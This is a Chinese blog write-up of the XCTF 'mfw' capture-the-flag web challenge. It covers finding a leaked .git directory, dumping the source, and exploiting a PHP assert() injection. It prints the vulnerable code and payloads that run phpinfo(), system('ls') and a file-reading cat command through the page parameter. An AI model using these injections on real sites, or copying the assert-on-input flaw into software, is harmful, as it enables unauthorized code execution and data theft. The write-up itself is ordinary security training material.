2020.4.5 xctf(mfw)②

最新推荐文章于 2022-01-27 21:32:24 发布
最新推荐文章于 2022-01-27 21:32:24 发布
阅读量205 收藏
点赞数
分类专栏: web安全
原文链接:https://blog.csdn.net/qq_45552960/article/details/102415767
版权

打开网页看见(猜测git源码泄露):
在这里插入图片描述在URL后面加上./git发现:
在这里插入图片描述使用工具GitHack进行爬取
在这里插入图片描述在这里插入图片描述在这里插入图片描述
发现源码内存在flag.php 感觉没啥用
在这里插入图片描述

if (isset($_GET[‘page’])) {
$page = $_GET[‘page’];
} else {
$page = “home”;
}

$file = “templates/. $page ..php”;

// I heard ‘…’ is dangerous!
assert(“strpos(’$file, ‘…’) === false”) or die(“Detected hacking attempt!”);

// TODO: Make this look nice
assert(“file_exists(’$file)) or die(“That file doesn’t exist!”);

了解assert()函数和strpos函数的使用:
在这里插入图片描述在这里插入图片描述assert()函数会将读入的代码当做PHP代码来执行,这就方便了!!
进行注入,注入的思路:

首先对strpos函数进行闭合,构造一下,**page=’)**

可以把后面', '..') === false的给注释掉**(这里必须用 // 来注释)**
构造**page=').phpinfo();//**,可以得到回显

在这里插入图片描述 或者不注释也行,直接插入,构造page=’.phpinfo().’,也可以看见:
在这里插入图片描述

既然可以执行函数,那就简单了,使用system()函数(system函数详解),构造查看目录的

payload:?page='.system("ls").'或者page=').system("ls");//

前者直接显示,后者在源码中才能看见。

由于源码直接下载有,所以直接构造得到flag的payload:

?page=').system("cat templates/flag.php");//或者?page='.system("cat templates/flag.php").'

两者都需查看源码!!
在这里插入图片描述

藏蓝色的达达
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XCTF攻防世界web.doc
09-19
XCTF攻防世界Web WriteUp】 在网络安全竞赛中,CTF(Capture The Flag)是一种常见的形式,其中“XCTF攻防世界”是一个专注于Web安全的平台,旨在帮助参与者提升网络安全技能,特别是Web应用的安全防御和攻击能力...
xctf_huaweicloud-qualifier-2020
05-31
xctf_huaweicloud-qualifier-2020写上去译文原始码类别名称网址分数解决了PWN cp 游戏 快速执行 Fastga mysqli 迷你人 nday_container_escape qemu-zzz 网络隐藏云我的1 我的2 派尔 网壳 :cross_mark: 杂项以太网 谁...
XCTF WEB mfw
A_dmin的博客
06-03 4461
XCTF WEB mfw 比赛打自闭了,需要好好学习 打开网页看见(猜测git源码泄露): 在URL后面加上./git发现: 使用脚本,在Linux环境中: pip install requests git clone https://github.com/wangyihang/GitHacker.git python GitHacker.py [Website] 得到源码: flag...
XCTF-mfw
TA不懒,但还没有添加简介
01-27 298
XCTF-mfw
攻防世界XCTFmfw
末初的CSDN博客
03-07 447
发现使用git进行网站部署,尝试 /.git查看是否git泄漏。 git泄漏 当前大量开发人员使用git进行版本控制,对站点自动部署。 如果配置不当,可能会将.git文件夹直接部署到线上环境,这就引起了git泄露漏洞。 GitHack 项目地址:https://github.com/lijiejie/GitHack GitHack是一个.git泄露利用脚本,通过泄露的.git文件夹下的文件,还...
ctf赛题上传一个php木马,文件上传的ctf_web题目【伪协议】
weixin_34816913的博客
03-17 1060
1.第一题Qiyu_20170807_210121.png文件包含可以读到php源代码源代码:require("header.php");$page="";if (isset($_GET['page']))$page=$_GET['page'].".php"; #page参数自动添加了.php后缀,因此文件包含的index不需要加后缀else$page="main.php";include(...
XCTF-高手进阶区:mfw
1stPeak's Blog
06-13 3785
XCTF-高手进阶区-第三题:mfw 目标: 学习git泄露有关知识: 当前大量开发人员使用git进行版本控制,对站点自动部署。如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞 会简单构造php的payload 了解urlencode Writeup (1)我们在http://111.198.29.45:46634/?page=about页面看到如下图...
2020.4.6 xctf(shrine)
DSR446的博客
04-06 851
首先打开网站,看到网站的源码: import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/&...
xctf.rar_HTML5自适应
09-19
这个"xctf.rar"压缩包包含了一个实现HTML5全屏滚动效果的源码,它能实现平滑滚动,并且能够自适应不同浏览器的显示。 全屏滚动,也称为全屏滑动或全景观览,是一种让网页内容以连续的全屏视图展示的设计方式。这种...
XCTF-RE】新手练习区-re1.exe
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ugg9gy
XMan-MISC-诸葛建伟XCTF-public.pdf
12-04
MISC,中文即杂项,包括隐写,数据还原,脑洞、社会工程、与信息安全相关的大数据等。 竞赛过程中解MISC时会涉及到各种脑洞,各种花式技巧,主要考察选手的快速理解、学习能力以及日常知识积累的广度、深度。...
XCTF-MFW Git泄露,命令执行漏洞 详解
AAAAAAAAAAAA66的博客
11-15 1269
最近自学了1个月的CTFweb题,参加比赛一道题都没做出来,有点自闭,但还是告诉自己要慢慢来,有意向打CTF的同学可以私信,一起学习。 目录 题目 解题过程 总结 题目 解题过程 工具 思路 过程 总结 ...
05创建公务卡扣减明细表_CASH_USE_MINUSAMT_DETAIL_20240708-刘君.sql
最新发布
07-19
05创建公务卡扣减明细表_CASH_USE_MINUSAMT_DETAIL_20240708-刘君.sql
【BP回归预测】龙格库塔算法优化BP神经网络RUN-BP光伏数据预测(多输入单输出)【含Matlab源码 5171期】.zip
07-19
CSDN海神之光上传的全部代码均可运行,亲测可用,直接换数据就行,适合小白; 1、代码压缩包内容 主函数:Main .m; 数据; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,可私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开除Main.m的其他m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博主博客文章底部QQ名片; 4.1 CSDN博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 智能优化算法优化BP神经网络分类预测系列程序定制或科研合作方向: 4.4.1 遗传算法GA/蚁群算法ACO优化BP 4.4.2 粒子群算法PSO/蛙跳算法SFLA优化BP 4.4.3 灰狼算法GWO/狼群算法WPA优化BP 4.4.4 鲸鱼算法WOA/麻雀算法SSA优化BP 4.4.5 萤火虫算法FA/差分算法DE优化BP 4.4.6 其他优化算法优化BP
在UCA上结合DOA估计算法和自适应波束形成matlab代码.rar
07-19
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
【信号分解】基于海鸥优化算法SOA-CEEMDAN实现信号去躁附matlab代码.rar
07-19
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
毕业设计javajspKTV包房管理系统(ssh)-qkrp源码含文档
07-19
毕业设计javajspKTV包房管理系统(ssh)-qkrp源码含文档 后台是ssh框架,页面是jsp,数据库mysql,jdk1.8,开发工具用ecplise、myecplise、sts、idea都可以 采用全新的计算机网络和管理系统,将成为提高KTV管理效率,改善服务水准的重要手段之一。所以城市KTV包房信息管理系统是KTV经营不可缺少的现代工具。系统的主要功能包括:会员管理、类别管理、包房管理、预订管理。 包含:源码、数据库脚本、论文、环境工具包、相同框架项目的安装教程(在说明文档中)
基于Springboot的图书管理系统论文
07-19
传统信息管理主要依赖管理人员的手工登记与管理。然而,近年来信息技术的快速进步促使许多陈旧的信息管理方式得以更新。特别是图书信息,因其管理内容复杂且数量庞大,手工处理方式已难以满足广大用户的需求,于是图书管理系统应运而生。 本图书管理系统设有管理员和用户两种权限。管理员负责管理用户基本信息、公告信息及图书信息,并能与用户进行交流等。用户则可以查看图书信息、公告以及管理员的回复等。 该系统采用WEB应用程序开发中流行的小程序结构模式,使用空间占用小但功能全面的MySQL数据库进行数据存储,并运用了JSP技术进行开发。该图书管理系统有效解决了传统手工操作中的诸多问题,如数据查询耗时长、管理步骤繁琐等。总体而言,该图书管理系统性能稳定、功能完备,且具有较高的性价比。
xctf supersqli
09-01
对于 xctf supersqli,它是一个供参与者练习 SQL 注入技巧的 CTF(Capture The Flag)比赛题目。CTF比赛是一种网络安全竞赛,旨在测试参与者在各种安全领域的技能。在 xctf supersqli 中,参与者需要利用 SQL 注入漏洞来获取敏感数据或者执行非授权操作。这个题目可以帮助参与者提升对于 SQL 注入漏洞的理解和防御能力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值